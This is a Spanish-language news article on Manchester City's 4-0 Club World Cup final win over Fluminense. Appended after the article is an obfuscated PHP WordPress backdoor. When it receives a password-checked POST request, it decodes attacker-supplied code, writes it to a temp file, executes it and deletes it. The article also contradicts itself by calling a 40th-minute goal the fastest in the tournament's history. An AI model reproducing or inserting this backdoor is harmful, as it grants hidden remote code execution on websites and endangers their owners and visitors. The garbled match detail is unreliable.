Con un Julián Álvarez en llamas, Manchester City goleó a Fluminense y ratificó el dominio europeo en el Mundial de Clubes

Manchester City goleó a Fluminense 4-0, en el estadio King Abdullah Sports City de Yeda, Arabia Saudita, por la final del Mundial de Clubes y ratificó el dominio de los campeones de la Champions League de los últimos años. El argentino Julián Álvarez tuvo una descollante actuación, marcando dos goles y dando una asistencia.

A los 40 minutos nomás, el delantero campeón del mundo, anotó el primer gol. Se convirtió en el tanto más rápido de la historia del Mundial de Clubes. Álvarez convirtió de pecho -como una vez lo hizo Lionel Messi en este mismo torneo jugando para Barcelona y ante Estudiantes de La Plata- yendo a buscar el rebote en el área de un remate de Nathan Aké que pegó en el poste.

El conjunto de Pep Guardiola mostraba su amplia superioridad e imponía su estilo casi a voluntad. Y a los 27 minutos Nino al querer desviar un tiro de Phil Foden metió un gol en contra.

Ya en el segundo tiempo, siempre con dominio de Manchester City, Julián Álvarez asistió a Phil Foden para que empuje el balón directo al 3 a 0, a los 26 minutos.

Para coronar su enorme tarde, Julián Álvarez volvió a anotar, a los 42 minutos, con un derechazo cruzado.

Luego que Corinthians se coronase campeón del Mundial de Clubes en 2012, venciendo en la final a Chelsea, todos los siguientes vencedores fueron clubes europeos. Para Manchester City es su primer título en este certamen (antes Copa Intercontinental) y así se suma a la privilegiada nómina de 31 clubes que lo lograron.

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}